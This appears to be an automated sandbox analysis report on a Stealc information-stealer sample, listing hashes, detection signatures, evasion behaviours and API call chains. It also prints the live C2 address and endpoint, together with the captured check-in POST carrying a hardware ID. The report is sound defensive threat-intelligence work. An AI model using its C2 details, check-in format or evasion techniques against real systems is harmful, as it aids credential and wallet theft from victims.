Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561500
MD5: 4cc6d797a10ba2b6f877fc893f459f67
SHA1: a0c6551d531895b1d716a6f2e89da0cd0721f35a
SHA256: 2e9caa8ec6faf2bfcc89a031cc111e60654107d5979a197d1727266dffbc2b1a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4CC6D797A10BA2B6F877FC893F459F67)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7488 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7488 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-23T15:37:13.432950+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP

              AV Detection

              Source: file.exeAvira: detected
              Source: file.exe.7488.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D64C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D660D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D660D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D840B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00D840B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D76960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00D76960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00D6EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D69B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D69B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D76B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00D76B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D69B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D69B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D67750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00D67750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D718A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D73910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D71250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D71269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D7E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D7CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00D72390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D6DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D6DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D723A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D74B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D74B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D7D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00D7DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D616B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D616A0

              Networking

              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global traffic
              HTTP traffic detected:
              GET / HTTP/1.1
              Host: 185.215.113.206
              Connection: Keep-Alive
              Cache-Control: no-cache
              Source: global traffic
              HTTP traffic detected (multipart/form-data POST, 211-byte body shown decoded from the captured raw bytes):
              POST /c4becf79229cb002.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
              Host: 185.215.113.206
              Content-Length: 211
              Connection: Keep-Alive
              Cache-Control: no-cache

              ------BFCGDAAKFHIDBFIDBKFH
              Content-Disposition: form-data; name="hwid"

              55FD700FE8543207603164
              ------BFCGDAAKFHIDBFIDBKFH
              Content-Disposition: form-data; name="build"

              mars
              ------BFCGDAAKFHIDBFIDBKFH--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D64C50
              Source: global traffic
              HTTP traffic detected:
              GET / HTTP/1.1
              Host: 185.215.113.206
              Connection: Keep-Alive
              Cache-Control: no-cache
              Source: unknown
              HTTP traffic detected (multipart/form-data POST, 211-byte body shown decoded from the captured raw bytes):
              POST /c4becf79229cb002.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
              Host: 185.215.113.206
              Content-Length: 211
              Connection: Keep-Alive
              Cache-Control: no-cache

              ------BFCGDAAKFHIDBFIDBKFH
              Content-Disposition: form-data; name="hwid"

              55FD700FE8543207603164
              ------BFCGDAAKFHIDBFIDBKFH
              Content-Disposition: form-data; name="build"

              mars
              ------BFCGDAAKFHIDBFIDBKFH--
              Source: file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1831342123.0000000000C40000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1831342123.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/K
              Source: file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1831342123.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206b
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D69770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00D69770

              System Summary

              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D848B00_2_00D848B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE0_2_0111C1BE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE0150_2_011EE015
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E82F0_2_0107E82F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108E09F0_2_0108E09F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011213220_2_01121322
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011263A80_2_011263A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111DBE60_2_0111DBE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106627D0_2_0106627D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112B2830_2_0112B283
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037AD00_2_01037AD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01129D130_2_01129D13
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C15840_2_010C1584
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124747B0_2_0124747B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111F72A0_2_0111F72A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112CE280_2_0112CE28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01122EB90_2_01122EB9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111A6AB0_2_0111A6AB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011326F30_2_011326F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D0EEE0_2_010D0EEE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A4EF70_2_010A4EF7
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D64A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: agjwaxpt ZLIB complexity 0.9946596130425155
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D83A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D83A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00D7CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3S9OMQP6.htm
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
